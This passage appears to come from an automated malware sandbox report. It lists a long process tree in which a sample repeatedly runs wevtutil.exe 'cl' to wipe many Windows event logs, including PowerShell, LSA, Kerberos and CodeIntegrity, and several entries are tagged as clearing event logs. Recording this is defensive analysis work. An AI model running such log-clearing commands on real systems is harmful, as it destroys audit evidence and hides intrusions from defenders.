    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Operational
    3⤵
    PID:3116
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Admin
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
    3⤵
    PID:984
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Regsvr32/Operational
    3⤵
    - Clears Windows event logs
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReFS/Operational
    3⤵
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Operational
    3⤵
    PID:3744
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Operational
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RasAgileVpn/Operational
    3⤵
    PID:1320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Platform/Operational
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PushNotification-Platform/Admin
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Proximity-Common/Diagnostic
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService
    3⤵
    PID:3704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot
    3⤵
    - Clears Windows event logs
    PID:764
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade
    3⤵
    - Clears Windows event logs
    PID:4308
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/Analytic
    3⤵
    PID:3428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Privacy-Auditing/Operational
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Operational
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Admin
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintBRM/Admin
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Operational
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Admin
    3⤵
    PID:1568
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational
    3⤵
    - Clears Windows event logs
    PID:3180
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Policy/Operational
    3⤵
    - Clears Windows event logs
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Operational
    3⤵
    PID:4332
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-ScmBus/Certification
    3⤵
    - Clears Windows event logs
    PID:3236
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-PmemDisk/Operational
    3⤵
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PersistentMemory-Nvdimm/Operational
    3⤵
    PID:884
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PerceptionSensorDataService/Operational
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PerceptionRuntime/Operational
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Partition/Diagnostic
    3⤵
    - Clears Windows event logs
    PID:3156
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ParentalControls/Operational
    3⤵
    PID:872
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PackageStateRoaming/Operational
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OtpCredentialProvider/Operational
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine-DUI/Operational
    3⤵
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneX/Operational
    3⤵
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneBackup/Debug
    3⤵
    PID:4588
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Operational
    3⤵
    PID:4508
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OcpUpdateAgent/Operational
    3⤵
    PID:3056
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NTLM/Operational
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ntfs/WHC
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ntfs/Operational
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Operational
    3⤵
    PID:4688
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProvisioning/Operational
    3⤵
    PID:3640
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProvider/Operational
    3⤵
    PID:3184
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Operational
    3⤵
    - Clears Windows event logs
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkLocationWizard/Operational
    3⤵
    PID:3892
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NdisImPlatform/Operational
    3⤵
    PID:4716
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Operational
    3⤵
    - Clears Windows event logs
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Operational
    3⤵
    - Clears Windows event logs
    PID:952
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NcdAutoSetup/Operational
    3⤵
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Ncasvc/Operational
    3⤵
    - Clears Windows event logs
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Operational
    3⤵
    PID:3744
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Admin
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Admin
    3⤵
    PID:1320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mprddm/Operational
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot
    3⤵
    PID:2260
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin
    3⤵
    PID:784
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational
    3⤵
    PID:648
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MemoryDiagnostics-Results/Debug
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-Performance/SARStreamResource
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LSA/Operational
    3⤵
    PID:3152
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LiveId/Operational
    3⤵
    - Clears Windows event logs
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational
    3⤵
    - Clears Windows event logs
    PID:512
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Operational
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Performance
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Operational
    3⤵
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KeyboardFilter/Admin
    3⤵
    - Clears Windows event logs
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Operational
    3⤵
    PID:296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Errors
    3⤵
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Operational
    3⤵
    - Clears Windows event logs
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Operational
    3⤵
    - Clears Windows event logs
    PID:884
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ShimEngine/Operational
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Operational
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
    3⤵
    PID:3156
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-PnP/Configuration
    3⤵
    PID:872
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-LiveDump/Operational
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-IO/Operational
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Admin
    3⤵
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Boot/Operational
    3⤵
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-ApphelpCache/Operational
    3⤵
    PID:768
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kerberos/Operational
    3⤵
    PID:5036
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-KdsSvc/Operational
    3⤵
    PID:2592
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPxlatCfg/Operational
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Operational
    3⤵
    - Clears Windows event logs
    PID:3008
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International-RegionalOptionsControlPanel/Operational
    3⤵
    PID:4564
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKE/Operational
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IdCtrls/Operational
    3⤵
    PID:2156
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-VID-Admin
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Hypervisor-Operational
    3⤵
    PID:3432
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Hypervisor-Admin
    3⤵
    PID:3224
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Trace
    3⤵
    PID:2376
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Log
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HotspotAuth/Operational
    3⤵
    PID:3168
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:2340
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Help/Operational
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HelloForBusiness/Operational
    3⤵
    PID:2740
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GroupPolicy/Operational
    3⤵
    PID:2364
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-glcnd/Admin
    3⤵
    PID:5016
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GenericRoaming/Admin
    3⤵
    PID:3996
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Operational
    3⤵
    - Clears Windows event logs
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:2608
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Operational
    3⤵
    PID:3428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Engine/BackupLog
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileHistory-Core/WHC
    3⤵
    PID:3656
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FeatureConfiguration/Operational
    3⤵
    PID:4272
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Fault-Tolerant-Heap/Operational
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Operational
    3⤵
    PID:2540
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ESE/Operational
    3⤵
    PID:3324
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Energy-Estimation-Engine/EventLog
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Audit-TCB/Admin
    3⤵
    PID:3616
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Audit-Regular/Admin
    3⤵
    - Clears Windows event logs
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EDP-Application-Learning/Admin
    3⤵
    PID:2872
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-Ttls/Operational
    3⤵
    - Clears Windows event logs
    PID:3732
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-Sim/Operational
    3⤵
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-RasTls/Operational
    3⤵
    PID:2864
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapMethods-RasChap/Operational
    3⤵
    PID:4304
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Operational
    3⤵
    PID:2516
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl-Operational
    3⤵
    PID:3296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl-Admin
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DucUpdateAgent/Operational
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Operational
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Admin
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DriverFrameworks-UserMode/Operational
    3⤵
    PID:3264
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DNS-Client/Operational
    3⤵
    PID:2992
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Operational
    3⤵
    - Clears Windows event logs
    PID:1236
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticResolver/Operational
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticDataCollector/Operational
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnostic/Operational
    3⤵
    PID:4588
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Operational
    3⤵
    PID:3532
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Operational
    3⤵
    PID:840
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational
    3⤵
    PID:3528
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Operational
    3⤵
    PID:3052
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Admin
    3⤵
    PID:3300
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scheduled/Operational
    3⤵
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Operational
    3⤵
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Operational
    3⤵
    PID:1120
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Operational
    3⤵
    PID:3572
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Operational
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Admin
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Operational
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Admin
    3⤵
    PID:984
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUpdateAgent/Operational
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Operational
    3⤵
    PID:2184
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Operational
    3⤵
    - Clears Windows event logs
    PID:1860
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Admin
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Devices-Background/Operational
    3⤵
    PID:1756
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational
    3⤵
    - Clears Windows event logs
    PID:2600
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceGuard/Operational
    3⤵
    PID:940
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Scrubbing
    3⤵
    PID:1128
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Operational
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Diagnostic
    3⤵
    - Clears Windows event logs
    PID:3500
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Operational
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DataIntegrityScan/CrashRecovery
    3⤵
    PID:1132
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DataIntegrityScan/Admin
    3⤵
    PID:3676
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DAL-Provider/Operational
    3⤵
    PID:3740
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-NCrypt/Operational
    3⤵
    PID:512
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/Operational
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/Debug
    3⤵
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc
    3⤵
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Server/Operational
    3⤵
    - Clears Windows event logs
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Client/Operational
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational
    3⤵
    PID:3232
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreApplication/Operational
    3⤵
    PID:296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcnfs/Operational
    3⤵
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcifs/Operational
    3⤵
    - Clears Windows event logs
    PID:884
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-BindFlt/Operational
    3⤵
    - Clears Windows event logs
    PID:2820
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Compat-Appraiser/Operational
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Operational
    3⤵
    - Clears Windows event logs
    PID:412
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CloudStore/Operational
    3⤵
    PID:872
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CloudStore/Debug
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Cleanmgr/Diagnostic
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
